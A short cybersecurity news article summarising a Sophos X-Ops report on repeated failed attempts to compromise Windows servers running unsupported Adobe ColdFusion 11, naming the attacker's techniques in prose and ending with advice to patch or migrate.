Unknown Actor Targets Windows Servers via Old Adobe Software
In the realm of cybersecurity, servers have always been a hotspot for hackers. Given their privileges, infiltrating servers facilitates easy lateral movement within networks. Recently, Sophos X-Ops unveiled a string of attempted hacks against Windows servers running outdated versions of Adobe’s ColdFusion software. Although unsuccessful, these persistent attempts shed light on the techniques and determination of today’s cybercriminals.
The Sophos team identified a variety of threats targeting servers, with Cobalt Strike Beacons, ransomware, PowerShell backdoors, miners, and webshells topping the list. Between September and October, a unique actor, identified by their attack patterns, tried leveraging vulnerabilities in unsupported Adobe ColdFusion versions to deploy ransomware. The payloads unveiled intentions to deploy a ransomware variant stemming from the leaked LockBit 3.0 family source code.
On a particular day, September 20, after gaining initial access, the attacker made a series of attempts to exploit the server. Starting with a DNS test using a “ping” command aimed at the attacker-controlled host, the actor sought to identify the server’s vulnerability to remote attacks. Their next move, after confirming the server’s remote connectivity, was to execute a PowerShell script aimed at downloading and deploying a Cobalt Strike Beacon. This attempt, however, was foiled by Sophos’ behavioral detection mechanism.
Not one to back down easily, the attacker made multiple similar attempts, using different methods and payloads, including a reverse interactive PowerShell, and even an encoded Cobalt Strike Beacon loader, all designed to operate discreetly. Despite these relentless efforts, every attempt was thwarted by the server’s robust endpoint protection.
Days later, the same attacker returned with an arsenal of fresh techniques. Their persistence was evident when they employed an HTA (HTML Application) file, aiming yet again to deploy the elusive Cobalt Strike Beacon. However, even this approach was halted by Sophos’ detection system.
Perhaps most intriguing was the discovery that the attacker inadvertently left directory listings open on their web server, revealing their toolkit. This “treasure trove” provided a glimpse into all the tools and the intended final ransomware payload. This ransomware, named “BlackDog 2023”, seemingly had ties to the Lockbit 3.0’s leaked source code, pointing to a potentially new ransomware family.
From the data, it’s evident that the targeted servers were running ColdFusion 11.x, a version Adobe ceased supporting in 2021. The vulnerabilities of such obsolete software underscore the critical need for timely updates and patches. Sophos emphasizes that, while endpoint protection can shield against many attacks, it’s no substitute for regular software updates. They strongly advocate for migrating to updated, supported versions of server products, or if that’s unfeasible, ensuring rigorous measures to mitigate vulnerabilities.
In this evolving cybersecurity landscape, while sophisticated tools and techniques might be the weapon of choice for hackers, diligence, updated defenses, and an observant eye can still keep them at bay.